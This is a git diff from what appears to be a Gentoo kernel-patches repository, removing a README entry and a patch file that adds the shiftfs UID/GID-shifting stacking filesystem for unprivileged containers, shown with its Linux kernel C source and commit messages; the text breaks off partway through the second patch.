diff options
-rw-r--r-- | 0000_README | 4 | ||||
-rw-r--r-- | 5000_shiftfs-6.2-2023-01-31.patch | 6607 |
2 files changed, 0 insertions, 6611 deletions
diff --git a/0000_README b/0000_README index b2b768d6..49d3a418 100644 --- a/0000_README +++ b/0000_README @@ -87,10 +87,6 @@ Patch: 4567_distro-Gentoo-Kconfig.patch From: Tom Wijsman <TomWij@gentoo.org> Desc: Add Gentoo Linux support config settings and defaults. -Patch: 5000_shiftfs-6.2-2023-01-31.patch -From: https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/unstable -Desc: Kernel module that provides a kernel filesystem for uid/gid shifting - Patch: 5010_enable-cpu-optimizations-universal.patch From: https://github.com/graysky2/kernel_compiler_patch Desc: Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs. diff --git a/5000_shiftfs-6.2-2023-01-31.patch b/5000_shiftfs-6.2-2023-01-31.patch deleted file mode 100644 index 44603abb..00000000 --- a/5000_shiftfs-6.2-2023-01-31.patch +++ /dev/null @@ -1,6607 +0,0 @@ -From b554e3101fdc94969141491a4234b3c931683b5c Mon Sep 17 00:00:00 2001 -From: James Bottomley <James.Bottomley@HansenPartnership.com> -Date: Thu, 4 Apr 2019 15:39:11 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: uid/gid shifting bind mount -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1823186 - -This allows any subtree to be uid/gid shifted and bound elsewhere. It -does this by operating simlarly to overlayfs. Its primary use is for -shifting the underlying uids of filesystems used to support -unpriviliged (uid shifted) containers. The usual use case here is -that the container is operating with an uid shifted unprivileged root -but sometimes needs to make use of or work with a filesystem image -that has root at real uid 0. - -The mechanism is to allow any subordinate mount namespace to mount a -shiftfs filesystem (by marking it FS_USERNS_MOUNT) but only allowing -it to mount marked subtrees (using the -o mark option as root). Once -mounted, the subtree is mapped via the super block user namespace so -that the interior ids of the mounting user namespace are the ids -written to the filesystem. - -Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com> -[ saf: use designated initializers for path declarations to fix errors - with struct randomization ] -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -[update: port to 5.0] -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/Kconfig | 8 + - fs/Makefile | 1 + - fs/shiftfs.c | 780 +++++++++++++++++++++++++++++++++++++ - include/uapi/linux/magic.h | 2 + - 4 files changed, 791 insertions(+) - create mode 100644 fs/shiftfs.c - -diff --git a/fs/Kconfig b/fs/Kconfig -index 2685a4d0d353..b53bece1e940 100644 ---- a/fs/Kconfig -+++ b/fs/Kconfig -@@ -128,6 +128,14 @@ source "fs/autofs/Kconfig" - source "fs/fuse/Kconfig" - source "fs/overlayfs/Kconfig" - -+config SHIFT_FS -+ tristate "UID/GID shifting overlay filesystem for containers" -+ help -+ This filesystem can overlay any mounted filesystem and shift -+ the uid/gid the files appear at. The idea is that -+ unprivileged containers can use this to mount root volumes -+ using this technique. -+ - menu "Caches" - - source "fs/netfs/Kconfig" -diff --git a/fs/Makefile b/fs/Makefile -index 4dea17840761..628632dcb9b1 100644 ---- a/fs/Makefile -+++ b/fs/Makefile -@@ -137,3 +137,4 @@ obj-$(CONFIG_EFIVAR_FS) += efivarfs/ - obj-$(CONFIG_EROFS_FS) += erofs/ - obj-$(CONFIG_VBOXSF_FS) += vboxsf/ - obj-$(CONFIG_ZONEFS_FS) += zonefs/ -+obj-$(CONFIG_SHIFT_FS) += shiftfs.o -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -new file mode 100644 -index 000000000000..f7cada126daa ---- /dev/null -+++ b/fs/shiftfs.c -@@ -0,0 +1,780 @@ -+#include <linux/cred.h> -+#include <linux/mount.h> -+#include <linux/file.h> -+#include <linux/fs.h> -+#include <linux/namei.h> -+#include <linux/module.h> -+#include <linux/kernel.h> -+#include <linux/magic.h> -+#include <linux/parser.h> -+#include <linux/seq_file.h> -+#include <linux/statfs.h> -+#include <linux/slab.h> -+#include <linux/user_namespace.h> -+#include <linux/uidgid.h> -+#include <linux/xattr.h> -+ -+struct shiftfs_super_info { -+ struct vfsmount *mnt; -+ struct user_namespace *userns; -+ bool mark; -+}; -+ -+static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode, -+ struct dentry *dentry); -+ -+enum { -+ OPT_MARK, -+ OPT_LAST, -+}; -+ -+/* global filesystem options */ -+static const match_table_t tokens = { -+ { OPT_MARK, "mark" }, -+ { OPT_LAST, NULL } -+}; -+ -+static const struct cred *shiftfs_get_up_creds(struct super_block *sb) -+{ -+ struct shiftfs_super_info *ssi = sb->s_fs_info; -+ struct cred *cred = prepare_creds(); -+ -+ if (!cred) -+ return NULL; -+ -+ cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid)); -+ cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid)); -+ put_user_ns(cred->user_ns); -+ cred->user_ns = get_user_ns(ssi->userns); -+ -+ return cred; -+} -+ -+static const struct cred *shiftfs_new_creds(const struct cred **newcred, -+ struct super_block *sb) -+{ -+ const struct cred *cred = shiftfs_get_up_creds(sb); -+ -+ *newcred = cred; -+ -+ if (cred) -+ cred = override_creds(cred); -+ else -+ printk(KERN_ERR "shiftfs: Credential override failed: no memory\n"); -+ -+ return cred; -+} -+ -+static void shiftfs_old_creds(const struct cred *oldcred, -+ const struct cred **newcred) -+{ -+ if (!*newcred) -+ return; -+ -+ revert_creds(oldcred); -+ put_cred(*newcred); -+} -+ -+static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options) -+{ -+ char *p; -+ substring_t args[MAX_OPT_ARGS]; -+ -+ ssi->mark = false; -+ -+ while ((p = strsep(&options, ",")) != NULL) { -+ int token; -+ -+ if (!*p) -+ continue; -+ -+ token = match_token(p, tokens, args); -+ switch (token) { -+ case OPT_MARK: -+ ssi->mark = true; -+ break; -+ default: -+ return -EINVAL; -+ } -+ } -+ return 0; -+} -+ -+static void shiftfs_d_release(struct dentry *dentry) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ -+ dput(real); -+} -+ -+static struct dentry *shiftfs_d_real(struct dentry *dentry, -+ const struct inode *inode) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ -+ if (unlikely(real->d_flags & DCACHE_OP_REAL)) -+ return real->d_op->d_real(real, real->d_inode); -+ -+ return real; -+} -+ -+static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ -+ if (d_unhashed(real)) -+ return 0; -+ -+ if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE)) -+ return 1; -+ -+ return real->d_op->d_weak_revalidate(real, flags); -+} -+ -+static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ int ret; -+ -+ if (d_unhashed(real)) -+ return 0; -+ -+ /* -+ * inode state of underlying changed from positive to negative -+ * or vice versa; force a lookup to update our view -+ */ -+ if (d_is_negative(real) != d_is_negative(dentry)) -+ return 0; -+ -+ if (!(real->d_flags & DCACHE_OP_REVALIDATE)) -+ return 1; -+ -+ ret = real->d_op->d_revalidate(real, flags); -+ -+ if (ret == 0 && !(flags & LOOKUP_RCU)) -+ d_invalidate(real); -+ -+ return ret; -+} -+ -+static const struct dentry_operations shiftfs_dentry_ops = { -+ .d_release = shiftfs_d_release, -+ .d_real = shiftfs_d_real, -+ .d_revalidate = shiftfs_d_revalidate, -+ .d_weak_revalidate = shiftfs_d_weak_revalidate, -+}; -+ -+static int shiftfs_readlink(struct dentry *dentry, char __user *data, -+ int flags) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ const struct inode_operations *iop = real->d_inode->i_op; -+ -+ if (iop->readlink) -+ return iop->readlink(real, data, flags); -+ -+ return -EINVAL; -+} -+ -+static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode, -+ struct delayed_call *done) -+{ -+ if (dentry) { -+ struct dentry *real = dentry->d_fsdata; -+ struct inode *reali = real->d_inode; -+ const struct inode_operations *iop = reali->i_op; -+ const char *res = ERR_PTR(-EPERM); -+ -+ if (iop->get_link) -+ res = iop->get_link(real, reali, done); -+ -+ return res; -+ } else { -+ /* RCU lookup not supported */ -+ return ERR_PTR(-ECHILD); -+ } -+} -+ -+static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode, -+ const char *name, const void *value, -+ size_t size, int flags) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ int err = -EOPNOTSUPP; -+ const struct cred *oldcred, *newcred; -+ -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ err = vfs_setxattr(real, name, value, size, flags); -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ return err; -+} -+ -+static int shiftfs_xattr_get(const struct xattr_handler *handler, -+ struct dentry *dentry, struct inode *inode, -+ const char *name, void *value, size_t size) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ int err; -+ const struct cred *oldcred, *newcred; -+ -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ err = vfs_getxattr(real, name, value, size); -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ return err; -+} -+ -+static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list, -+ size_t size) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ int err; -+ const struct cred *oldcred, *newcred; -+ -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ err = vfs_listxattr(real, list, size); -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ return err; -+} -+ -+static int shiftfs_removexattr(struct dentry *dentry, const char *name) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ int err; -+ const struct cred *oldcred, *newcred; -+ -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ err = vfs_removexattr(real, name); -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ return err; -+} -+ -+static int shiftfs_xattr_set(const struct xattr_handler *handler, -+ struct dentry *dentry, struct inode *inode, -+ const char *name, const void *value, size_t size, -+ int flags) -+{ -+ if (!value) -+ return shiftfs_removexattr(dentry, name); -+ return shiftfs_setxattr(dentry, inode, name, value, size, flags); -+} -+ -+static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry) -+{ -+ struct inode *reali; -+ -+ if (!dentry) -+ return; -+ -+ reali = dentry->d_inode; -+ -+ if (!reali->i_op->get_link) -+ inode->i_opflags |= IOP_NOFOLLOW; -+ -+ inode->i_mapping = reali->i_mapping; -+ inode->i_private = dentry; -+} -+ -+static int shiftfs_make_object(struct inode *dir, struct dentry *dentry, -+ umode_t mode, const char *symlink, -+ struct dentry *hardlink, bool excl) -+{ -+ struct dentry *real = dir->i_private, *new = dentry->d_fsdata; -+ struct inode *reali = real->d_inode, *newi; -+ const struct inode_operations *iop = reali->i_op; -+ int err; -+ const struct cred *oldcred, *newcred; -+ bool op_ok = false; -+ -+ if (hardlink) { -+ op_ok = iop->link; -+ } else { -+ switch (mode & S_IFMT) { -+ case S_IFDIR: -+ op_ok = iop->mkdir; -+ break; -+ case S_IFREG: -+ op_ok = iop->create; -+ break; -+ case S_IFLNK: -+ op_ok = iop->symlink; -+ } -+ } -+ if (!op_ok) -+ return -EINVAL; -+ -+ -+ newi = shiftfs_new_inode(dentry->d_sb, mode, NULL); -+ if (!newi) -+ return -ENOMEM; -+ -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ -+ inode_lock_nested(reali, I_MUTEX_PARENT); -+ -+ err = -EINVAL; /* shut gcc up about uninit var */ -+ if (hardlink) { -+ struct dentry *realhardlink = hardlink->d_fsdata; -+ -+ err = vfs_link(realhardlink, reali, new, NULL); -+ } else { -+ switch (mode & S_IFMT) { -+ case S_IFDIR: -+ err = vfs_mkdir(reali, new, mode); -+ break; -+ case S_IFREG: -+ err = vfs_create(reali, new, mode, excl); -+ break; -+ case S_IFLNK: -+ err = vfs_symlink(reali, new, symlink); -+ } -+ } -+ -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ if (err) -+ goto out_dput; -+ -+ shiftfs_fill_inode(newi, new); -+ -+ d_instantiate(dentry, newi); -+ -+ new = NULL; -+ newi = NULL; -+ -+ out_dput: -+ dput(new); -+ iput(newi); -+ inode_unlock(reali); -+ -+ return err; -+} -+ -+static int shiftfs_create(struct inode *dir, struct dentry *dentry, -+ umode_t mode, bool excl) -+{ -+ mode |= S_IFREG; -+ -+ return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl); -+} -+ -+static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry, -+ umode_t mode) -+{ -+ mode |= S_IFDIR; -+ -+ return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false); -+} -+ -+static int shiftfs_link(struct dentry *hardlink, struct inode *dir, -+ struct dentry *dentry) -+{ -+ return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false); -+} -+ -+static int shiftfs_symlink(struct inode *dir, struct dentry *dentry, -+ const char *symlink) -+{ -+ return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false); -+} -+ -+static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) -+{ -+ struct dentry *real = dir->i_private, *new = dentry->d_fsdata; -+ struct inode *reali = real->d_inode; -+ int err; -+ const struct cred *oldcred, *newcred; -+ -+ inode_lock_nested(reali, I_MUTEX_PARENT); -+ -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ -+ if (rmdir) -+ err = vfs_rmdir(reali, new); -+ else -+ err = vfs_unlink(reali, new, NULL); -+ -+ shiftfs_old_creds(oldcred, &newcred); -+ inode_unlock(reali); -+ -+ return err; -+} -+ -+static int shiftfs_unlink(struct inode *dir, struct dentry *dentry) -+{ -+ return shiftfs_rm(dir, dentry, false); -+} -+ -+static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry) -+{ -+ return shiftfs_rm(dir, dentry, true); -+} -+ -+static int shiftfs_rename(struct inode *olddir, struct dentry *old, -+ struct inode *newdir, struct dentry *new, -+ unsigned int flags) -+{ -+ struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private, -+ *realold = old->d_fsdata, -+ *realnew = new->d_fsdata, *trap; -+ struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode; -+ int err = -EINVAL; -+ const struct cred *oldcred, *newcred; -+ -+ trap = lock_rename(rndd, rodd); -+ -+ if (trap == realold || trap == realnew) -+ goto out_unlock; -+ -+ oldcred = shiftfs_new_creds(&newcred, old->d_sb); -+ -+ err = vfs_rename(realolddir, realold, realnewdir, -+ realnew, NULL, flags); -+ -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ out_unlock: -+ unlock_rename(rndd, rodd); -+ -+ return err; -+} -+ -+static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry, -+ unsigned int flags) -+{ -+ struct dentry *real = dir->i_private, *new; -+ struct inode *reali = real->d_inode, *newi; -+ const struct cred *oldcred, *newcred; -+ -+ inode_lock(reali); -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len); -+ shiftfs_old_creds(oldcred, &newcred); -+ inode_unlock(reali); -+ -+ if (IS_ERR(new)) -+ return new; -+ -+ dentry->d_fsdata = new; -+ -+ newi = NULL; -+ if (!new->d_inode) -+ goto out; -+ -+ newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new); -+ if (!newi) { -+ dput(new); -+ return ERR_PTR(-ENOMEM); -+ } -+ -+ out: -+ return d_splice_alias(newi, dentry); -+} -+ -+static int shiftfs_permission(struct inode *inode, int mask) -+{ -+ struct dentry *real = inode->i_private; -+ struct inode *reali = real->d_inode; -+ const struct inode_operations *iop = reali->i_op; -+ int err; -+ const struct cred *oldcred, *newcred; -+ -+ if (mask & MAY_NOT_BLOCK) -+ return -ECHILD; -+ -+ oldcred = shiftfs_new_creds(&newcred, inode->i_sb); -+ if (iop->permission) -+ err = iop->permission(reali, mask); -+ else -+ err = generic_permission(reali, mask); -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ return err; -+} -+ -+static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ struct inode *reali = real->d_inode; -+ const struct inode_operations *iop = reali->i_op; -+ struct iattr newattr = *attr; -+ const struct cred *oldcred, *newcred; -+ struct super_block *sb = dentry->d_sb; -+ int err; -+ -+ newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid)); -+ newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid)); -+ -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ inode_lock(reali); -+ if (iop->setattr) -+ err = iop->setattr(real, &newattr); -+ else -+ err = simple_setattr(real, &newattr); -+ inode_unlock(reali); -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ if (err) -+ return err; -+ -+ /* all OK, reflect the change on our inode */ -+ setattr_copy(d_inode(dentry), attr); -+ return 0; -+} -+ -+static int shiftfs_getattr(const struct path *path, struct kstat *stat, -+ u32 request_mask, unsigned int query_flags) -+{ -+ struct inode *inode = path->dentry->d_inode; -+ struct dentry *real = path->dentry->d_fsdata; -+ struct inode *reali = real->d_inode; -+ const struct inode_operations *iop = reali->i_op; -+ struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real }; -+ int err = 0; -+ -+ if (iop->getattr) -+ err = iop->getattr(&newpath, stat, request_mask, query_flags); -+ else -+ generic_fillattr(reali, stat); -+ -+ if (err) -+ return err; -+ -+ /* transform the underlying id */ -+ stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid)); -+ stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid)); -+ return 0; -+} -+ -+static const struct inode_operations shiftfs_inode_ops = { -+ .lookup = shiftfs_lookup, -+ .getattr = shiftfs_getattr, -+ .setattr = shiftfs_setattr, -+ .permission = shiftfs_permission, -+ .mkdir = shiftfs_mkdir, -+ .symlink = shiftfs_symlink, -+ .get_link = shiftfs_get_link, -+ .readlink = shiftfs_readlink, -+ .unlink = shiftfs_unlink, -+ .rmdir = shiftfs_rmdir, -+ .rename = shiftfs_rename, -+ .link = shiftfs_link, -+ .create = shiftfs_create, -+ .mknod = NULL, /* no special files currently */ -+ .listxattr = shiftfs_listxattr, -+}; -+ -+static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode, -+ struct dentry *dentry) -+{ -+ struct inode *inode; -+ -+ inode = new_inode(sb); -+ if (!inode) -+ return NULL; -+ -+ /* -+ * our inode is completely vestigial. All lookups, getattr -+ * and permission checks are done on the underlying inode, so -+ * what the user sees is entirely from the underlying inode. -+ */ -+ mode &= S_IFMT; -+ -+ inode->i_ino = get_next_ino(); -+ inode->i_mode = mode; -+ inode->i_flags |= S_NOATIME | S_NOCMTIME; -+ -+ inode->i_op = &shiftfs_inode_ops; -+ -+ shiftfs_fill_inode(inode, dentry); -+ -+ return inode; -+} -+ -+static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry) -+{ -+ struct super_block *sb = dentry->d_sb; -+ struct shiftfs_super_info *ssi = sb->s_fs_info; -+ -+ if (ssi->mark) -+ seq_show_option(m, "mark", NULL); -+ -+ return 0; -+} -+ -+static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf) -+{ -+ struct super_block *sb = dentry->d_sb; -+ struct shiftfs_super_info *ssi = sb->s_fs_info; -+ struct dentry *root = sb->s_root; -+ struct dentry *realroot = root->d_fsdata; -+ struct path realpath = { .mnt = ssi->mnt, .dentry = realroot }; -+ int err; -+ -+ err = vfs_statfs(&realpath, buf); -+ if (err) -+ return err; -+ -+ buf->f_type = sb->s_magic; -+ -+ return 0; -+} -+ -+static void shiftfs_put_super(struct super_block *sb) -+{ -+ struct shiftfs_super_info *ssi = sb->s_fs_info; -+ -+ mntput(ssi->mnt); -+ put_user_ns(ssi->userns); -+ kfree(ssi); -+} -+ -+static const struct xattr_handler shiftfs_xattr_handler = { -+ .prefix = "", -+ .get = shiftfs_xattr_get, -+ .set = shiftfs_xattr_set, -+}; -+ -+const struct xattr_handler *shiftfs_xattr_handlers[] = { -+ &shiftfs_xattr_handler, -+ NULL -+}; -+ -+static const struct super_operations shiftfs_super_ops = { -+ .put_super = shiftfs_put_super, -+ .show_options = shiftfs_show_options, -+ .statfs = shiftfs_statfs, -+}; -+ -+struct shiftfs_data { -+ void *data; -+ const char *path; -+}; -+ -+static int shiftfs_fill_super(struct super_block *sb, void *raw_data, -+ int silent) -+{ -+ struct shiftfs_data *data = raw_data; -+ char *name = kstrdup(data->path, GFP_KERNEL); -+ int err = -ENOMEM; -+ struct shiftfs_super_info *ssi = NULL; -+ struct path path; -+ struct dentry *dentry; -+ -+ if (!name) -+ goto out; -+ -+ ssi = kzalloc(sizeof(*ssi), GFP_KERNEL); -+ if (!ssi) -+ goto out; -+ -+ err = -EPERM; -+ err = shiftfs_parse_options(ssi, data->data); -+ if (err) -+ goto out; -+ -+ /* to mark a mount point, must be real root */ -+ if (ssi->mark && !capable(CAP_SYS_ADMIN)) -+ goto out; -+ -+ /* else to mount a mark, must be userns admin */ -+ if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN)) -+ goto out; -+ -+ err = kern_path(name, LOOKUP_FOLLOW, &path); -+ if (err) -+ goto out; -+ -+ err = -EPERM; -+ -+ if (!S_ISDIR(path.dentry->d_inode->i_mode)) { -+ err = -ENOTDIR; -+ goto out_put; -+ } -+ -+ sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1; -+ if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) { -+ printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n"); -+ err = -EINVAL; -+ goto out_put; -+ } -+ -+ if (ssi->mark) { -+ /* -+ * this part is visible unshifted, so make sure no -+ * executables that could be used to give suid -+ * privileges -+ */ -+ sb->s_iflags = SB_I_NOEXEC; -+ ssi->mnt = path.mnt; -+ dentry = path.dentry; -+ } else { -+ struct shiftfs_super_info *mp_ssi; -+ -+ /* -+ * this leg executes if we're admin capable in -+ * the namespace, so be very careful -+ */ -+ if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC) -+ goto out_put; -+ mp_ssi = path.dentry->d_sb->s_fs_info; -+ if (!mp_ssi->mark) -+ goto out_put; -+ ssi->mnt = mntget(mp_ssi->mnt); -+ dentry = dget(path.dentry->d_fsdata); -+ path_put(&path); -+ } -+ ssi->userns = get_user_ns(dentry->d_sb->s_user_ns); -+ sb->s_fs_info = ssi; -+ sb->s_magic = SHIFTFS_MAGIC; -+ sb->s_op = &shiftfs_super_ops; -+ sb->s_xattr = shiftfs_xattr_handlers; -+ sb->s_d_op = &shiftfs_dentry_ops; -+ sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry)); -+ sb->s_root->d_fsdata = dentry; -+ -+ return 0; -+ -+ out_put: -+ path_put(&path); -+ out: -+ kfree(name); -+ kfree(ssi); -+ return err; -+} -+ -+static struct dentry *shiftfs_mount(struct file_system_type *fs_type, -+ int flags, const char *dev_name, void *data) -+{ -+ struct shiftfs_data d = { data, dev_name }; -+ -+ return mount_nodev(fs_type, flags, &d, shiftfs_fill_super); -+} -+ -+static struct file_system_type shiftfs_type = { -+ .owner = THIS_MODULE, -+ .name = "shiftfs", -+ .mount = shiftfs_mount, -+ .kill_sb = kill_anon_super, -+ .fs_flags = FS_USERNS_MOUNT, -+}; -+ -+static int __init shiftfs_init(void) -+{ -+ return register_filesystem(&shiftfs_type); -+} -+ -+static void __exit shiftfs_exit(void) -+{ -+ unregister_filesystem(&shiftfs_type); -+} -+ -+MODULE_ALIAS_FS("shiftfs"); -+MODULE_AUTHOR("James Bottomley"); -+MODULE_DESCRIPTION("uid/gid shifting bind filesystem"); -+MODULE_LICENSE("GPL v2"); -+module_init(shiftfs_init) -+module_exit(shiftfs_exit) -diff --git a/include/uapi/linux/magic.h b/include/uapi/linux/magic.h -index 6325d1d0e90f..1f70efb41565 100644 ---- a/include/uapi/linux/magic.h -+++ b/include/uapi/linux/magic.h -@@ -102,4 +102,6 @@ - #define DEVMEM_MAGIC 0x454d444d /* "DMEM" */ - #define SECRETMEM_MAGIC 0x5345434d /* "SECM" */ - -+#define SHIFTFS_MAGIC 0x6a656a62 -+ - #endif /* __LINUX_MAGIC_H__ */ --- -2.39.2 - -From 7b502b7e97db8ec9deff14f434eed2f2fbc0cd2f Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Thu, 4 Apr 2019 15:39:12 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework and extend -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1823186 - -/* Introduction */ -The shiftfs filesystem is implemented as a stacking filesystem. Since it is -a stacking filesystem it shares concepts with overlayfs and ecryptfs. -Usually, shiftfs will be stacked upon another filesystem. The filesystem on -top - shiftfs - is referred to as "upper filesystem" or "overlay" and the -filesystem it is stacked upon is referred to as "lower filesystem" or -"underlay". - -/* Marked and Unmarked shiftfs mounts */ -To use shiftfs it is necessary that a given mount is marked as shiftable via -the "mark" mount option. Any mount of shiftfs without the "mark" mount option -not on top of a shiftfs mount with the "mark" mount option will be refused with -EPERM. -After a marked shiftfs mount has been performed other shiftfs mounts -referencing the marked shiftfs mount can be created. These secondary shiftfs -mounts are usually what are of interest. -The marked shiftfs mount will take a reference to the underlying mountpoint of -the directory it is marking as shiftable. Any unmarked shiftfts mounts -referencing this marked shifts mount will take a second reference to this -directory as well. This ensures that the underlying marked shiftfs mount can be -unmounted thereby dropping the reference to the underlying directory without -invalidating the mountpoint of said directory since the non-marked shiftfs -mount still holds another reference to it. - -/* Stacking Depth */ -Shiftfs tries to keep the stack as flat as possible to avoid hitting the -kernel enforced filesystem stacking limit. - -/* Permission Model */ -When the mark shiftfs mount is created shiftfs will record the credentials of -the creator of the super block and stash it in the super block. When other -non-mark shiftfs mounts are created that reference the mark shiftfs mount they -will stash another reference to the creators credentials. Before calling into -the underlying filesystem shiftfs will switch to the creators credentials and -revert to the original credentials after the underlying filesystem operation -returns. - -/* Mount Options */ -- mark - When set the mark mount option indicates that the mount in question is - allowed to be shifted. Since shiftfs it mountable in by user namespace root - non-initial user namespace this mount options ensures that the system - administrator has decided that the marked mount is safe to be shifted. - To mark a mount as shiftable CAP_SYS_ADMIN in the user namespace is required. -- passthrough={0,1,2,3} - This mount options functions as a bitmask. When set to a non-zero value - shiftfs will try to act as an invisible shim sitting on top of the - underlying filesystem. - - 1: Shifts will report the filesystem type of the underlay for stat-like - system calls. - - 2: Shiftfs will passthrough whitelisted ioctl() to the underlay. - - 3: Shiftfs will both use 1 and 2. -Note that mount options on a marked mount cannot be changed. - -/* Extended Attributes */ -Shiftfs will make sure to translate extended attributes. - -/* Inodes Numbers */ -Shiftfs inodes numbers are copied up from the underlying filesystem, i.e. -shiftfs inode numbers will be identical to the corresponding underlying -filesystem's inode numbers. This has the advantage that inotify and friends -should work out of the box. -(In essence, shiftfs is nothing but a 1:1 mirror of the underlying filesystem's - dentries and inodes.) - -/* Device Support */ -Shiftfs only supports the creation of pipe and socket devices. Character and -block devices cannot be created through shiftfs. - -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/Kconfig | 10 + - fs/shiftfs.c | 1852 ++++++++++++++++++++++++++++++++++++++++---------- - 2 files changed, 1493 insertions(+), 369 deletions(-) - -diff --git a/fs/Kconfig b/fs/Kconfig -index b53bece1e940..ada9a1234e72 100644 ---- a/fs/Kconfig -+++ b/fs/Kconfig -@@ -136,6 +136,16 @@ config SHIFT_FS - unprivileged containers can use this to mount root volumes - using this technique. - -+config SHIFT_FS_POSIX_ACL -+ bool "shiftfs POSIX Access Control Lists" -+ depends on SHIFT_FS -+ select FS_POSIX_ACL -+ help -+ POSIX Access Control Lists (ACLs) support permissions for users and -+ groups beyond the owner/group/world scheme. -+ -+ If you don't know what Access Control Lists are, say N. -+ - menu "Caches" - - source "fs/netfs/Kconfig" -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index f7cada126daa..ad1ae5bce6c1 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1,3 +1,4 @@ -+#include <linux/capability.h> - #include <linux/cred.h> - #include <linux/mount.h> - #include <linux/file.h> -@@ -7,83 +8,179 @@ - #include <linux/kernel.h> - #include <linux/magic.h> - #include <linux/parser.h> -+#include <linux/security.h> - #include <linux/seq_file.h> - #include <linux/statfs.h> - #include <linux/slab.h> - #include <linux/user_namespace.h> - #include <linux/uidgid.h> - #include <linux/xattr.h> -+#include <linux/posix_acl.h> -+#include <linux/posix_acl_xattr.h> -+#include <linux/uio.h> - - struct shiftfs_super_info { - struct vfsmount *mnt; - struct user_namespace *userns; -+ /* creds of process who created the super block */ -+ const struct cred *creator_cred; - bool mark; -+ unsigned int passthrough; -+ struct shiftfs_super_info *info_mark; - }; - --static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode, -- struct dentry *dentry); -+struct shiftfs_file_info { -+ struct path realpath; -+ struct file *realfile; -+}; -+ -+struct kmem_cache 